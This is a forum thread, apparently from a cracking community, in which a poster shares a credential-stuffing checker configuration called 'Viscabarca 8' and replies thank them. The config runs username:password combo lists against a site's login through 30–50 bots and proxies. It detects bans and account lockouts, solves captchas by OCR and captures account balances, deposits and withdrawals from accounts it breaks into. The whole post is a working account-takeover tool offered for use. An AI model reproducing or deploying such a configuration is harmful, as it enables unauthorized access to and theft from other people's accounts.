Viscabarca 8 Combo : User \ Pass Bots : 30 - 50 Proxy : Yes Capture : Yes Please click on the green button (not just the blue heart) to thank me for my work and I will continue to work for you Prof : [align=center][hide] [Wordlist] UserIndex=1 PassIndex=2 EmailIndex=0 [settings] SiteURL= Timeout=20 WaitBot=0 ResolveHost=0 ComboFilter=0 UsernameStart=6 UsernameEnd=8 PasswordStart=6 PasswordEnd=8 ComboMode=0 Letters=0 Digits=0 Alpha=0 Email=0 LowerUpper=0 LetterDigit=0 SpeciaChar=0 PasswordLetters=0 PasswordDigits=0 PasswordAlpha=0 PasswordEmail=0 PasswordLowerUpper=0 PasswordLetterDigit=0 PasswordSpeciaChar=0 EmailFilter=0 EmailMode=0 ProxyActivate=10 ProxyRatio=4 ProxyCombo=0 WaitTime=5 BanWindowWidth=1 BanWindowProxies=10 BanWindowRatio=10 blnNoProxies=0 RequestMethod=2 Referer=0 HTTPHeader= |Accept: */*|User-Agent: |Host: |Pragma: no-cache|Connection: keep-alive| POSTData=username=&password= [Fake] AfterFP=0 FollowRedirect=1 EnableConHits=0 Success=3 ConHits=10 EnableConLength=0 SourceTags=1 ConLength=200 blnSuccess=0 SuccessRetries=3 blnForbToOK=1 ForbToOkLength=1000 blnBadOcrCode=0 BadOcrCodeRetries=3 blnCompleteNot=1 HTTPFollow=1 blnProcessErrors=1 blnInvalidPath=1 UserField=0 [Form] IAParse=0 blnBasic=0 Action= Username=username Password=password Email= CustomData= NoIndex= AddData= Cookie=market=de-DE; currency=EUR; ssoinit=1 IAction=-1 IUser=-1 IPass=-1 IEmail=-2 ICaptcha=-1 ReqReferer= ReqCookie= AjaxURL= AjaxPOSTData= AjaxData= AjaxParsingCode= RefData= ParsingCode= FormRedirectUrl= RedPostData= LoginPostData= RedKeys= ||"message": "Ok" DataDesc=beginningBalanceAmount (SEHS)¤cy&endingBalanceAmount CaptureParsingCode=t":|,|#00|#00|0|#00|#00|0&y":"|"|#00|#00|0|#00|#00|0&dingBalanceAmount":|,|#00|#00|0|#00|#00|0 RefreshSession=0 RefreshCookie=0 IAMethod=2 POSTMethod=2 RedMethod=1 LoginMethod=1 AjaxHeader=0 FormHeader=0 RedHeader=1 LoginHeader=0 ImageAfterAjax=0 FollowRedirectsOnIA=0 FollowRedirectsOnRed=1 [Ajax] Variables= PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None RedURL= [OCR] OCRMode=0 URLMode=0 ImageURLID=|| Captcha= OCRKey= RefreshCaptcha=0 blnContrast=0 blnBrightness=0 blnSaturation=0 blnThreshold=0 blnInvert=0 blnNoise=0 blnIsolate=0 blnResize=0 blnBorder=0 blnCharExtract=0 blnRemoveColors=0 blnStringFilter=0 blnLetter=1 blnDigits=1 blnBlur=0 blnReconstruct=0 blnLower=0 blnUpper=0 blnRemoveLines=0 blnMultiChar=0 blnPalette=0 blnCharResize=0 blnCharSubExtraction=0 blnGif=0 blnCompute=0 blnBorderPre=0 Contrast=0 Brightness=0 Saturation=0 Threshold=0 Noise=1 Isolate=1 Resize=2 BorderLeft=0 BorderTop=0 BorderRight=0 BorderBottom=0 CharExtractMinBlack=0 CharExtractMaxBlack=1 CharExtractMinWidth=1 CharRotateMax=0 CharRotateSteps=5 MinLength=1 MaxLength=10 BlurRadius=1 CharExtractMaxWidth=33 CharWidthMinBlack=2 CharSpace=1 Range=0 InvertDensity=0 InvertLength=20 LineCurvatureMax=4 LineWidthMax=13 CharResize=1 CharHeight=13 GifStart=2 GifOffset=2 BorderLeftPre=0 BorderTopPre=0 BorderRightPre=0 BorderBottomPre=0 CharBorderH=5 CharBorderV=5 CharRotateBorder=5 CharExtractMinHeight=1 VerticalRejoin=30 CharExclude= SpecialChars= Colors= Colors2= Lines=Min Length: 2, Max Width: 5, Horizzontal Language=eng [Keywords] HeaderFail= HeaderSuccess= HeaderBan=HTTP/1.1 403 Forbidden HeaderRetry=(SEHSALI)&&||SEC.Methods SourceFail=Username and password did not match";||action="";"Account locked due to many incorrect attempts SourceSuccess="deposits";"withdrawls";(SEHSALI) SourceBan=To keep you safe from internet threats, please sign in to your company's security service;>Access Denined;>Please login to browse the internet;>Please wait a moment while we launch our security service;>Error SourceRetry= EnableHeaderFail=0 EnableHeaderSuccess=0 EnableHeaderBan=1 EnableHeaderRetry=1 EnableSourceFail=1 EnableSourceSuccess=1 EnableSourceBan=1 EnableSourceRetry=0 EnableGlobalSourceRetry=1 [/hide][/align] Quote Share this post Link to post Share on other sites
Yassinebtr 0 Tha'ks alot man Thanks man great job Quote Share this post Link to post Share on other sites
dordie954 2 Very cool. Was very close to having this config made. Thanks for posting this Quote Share this post Link to post Share on other sites
iamgoat 2 hope this one works the other one posted doesn't work? 1 Quote Share this post Link to post Share on other sites
sendnudes 1 will try this out now Combo : User \ Pass Bots : 30 - 50 Proxy : Yes Capture : Yes Please click on the green button (not just the blue heart) to thank me for my work and I will continue to work for you Prof : Combo : User \ Pass Bots : 30 - 50 Proxy : Yes Capture : Yes Please click on the green button (not just the blue heart) to thank me for my work and I will continue to work for you Prof : Quote Share this post Link to post Share on other sites
beig1989 2 Combo : User \ Pass Bots : 30 - 50 Proxy : Yes Capture : Yes Please click on the green button (not just the blue heart) to thank me for my work and I will continue to work for you Prof : thanks you very much Quote Share this post Link to post Share on other sites
Kronix 0 thank you for your work, will try out later :) Quote Share this post Link to post Share on other sites